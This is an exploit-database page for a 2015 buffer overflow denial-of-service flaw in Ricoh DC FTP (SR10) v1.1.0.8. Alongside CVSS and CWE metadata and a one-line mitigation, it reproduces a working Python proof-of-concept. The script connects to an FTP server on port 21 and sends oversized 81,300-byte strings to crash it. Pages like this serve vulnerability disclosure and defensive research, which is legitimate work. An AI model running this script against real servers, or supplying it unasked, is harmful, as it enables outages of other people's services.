header-logo
Suggest Exploit
vendor:
Ricoh DC FTP (SR10)
by:
j2x6
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Ricoh DC FTP (SR10)
Affected Version From: 1.1.0.8
Affected Version To: 1.1.0.8
Patch Exists: YES
Related CWE: N/A
CPE: a:ricoh:ricoh_dc_ftp_sr10:1.1.0.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2015

Rocoh DC FTP (SR10) v1.1.0.8 DoS

A buffer overflow vulnerability exists in the FTP server of the Ricoh DC FTP (SR10) v1.1.0.8 software. An attacker can send a specially crafted packet with a length of 81300 bytes or more to the FTP server, which will cause the server to crash. This can be exploited to cause a denial of service condition.

Mitigation:

Upgrade to the latest version of the Ricoh DC FTP (SR10) software.
Source

Exploit-DB raw data:

# Exploit Title: Rocoh DC FTP (SR10) v1.1.0.8 DoS
# Date: 8/31/2015
# Exploit Author: j2x6
# Vendor Homepage: http://www.ricoh-imaging.co.jp/
# Software Link: http://www.ricoh-imaging.co.jp/english/r_dc/download/sw/win/07.html
# Version: 1.1.0.8
# Tested on: Windows 7
# Offset for Buffer Overflow attempt: 495

#!/usr/bin/python

import socket

badthing= "A" * 81300

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.45.11',21))
s.send(badthing+'\r\n')
s.send(badthing+'\r\n')
s.send('\r\n')
s.send('EXIT\r\n')
s.close()

Navigation

Suggest Exploit

Services By CQR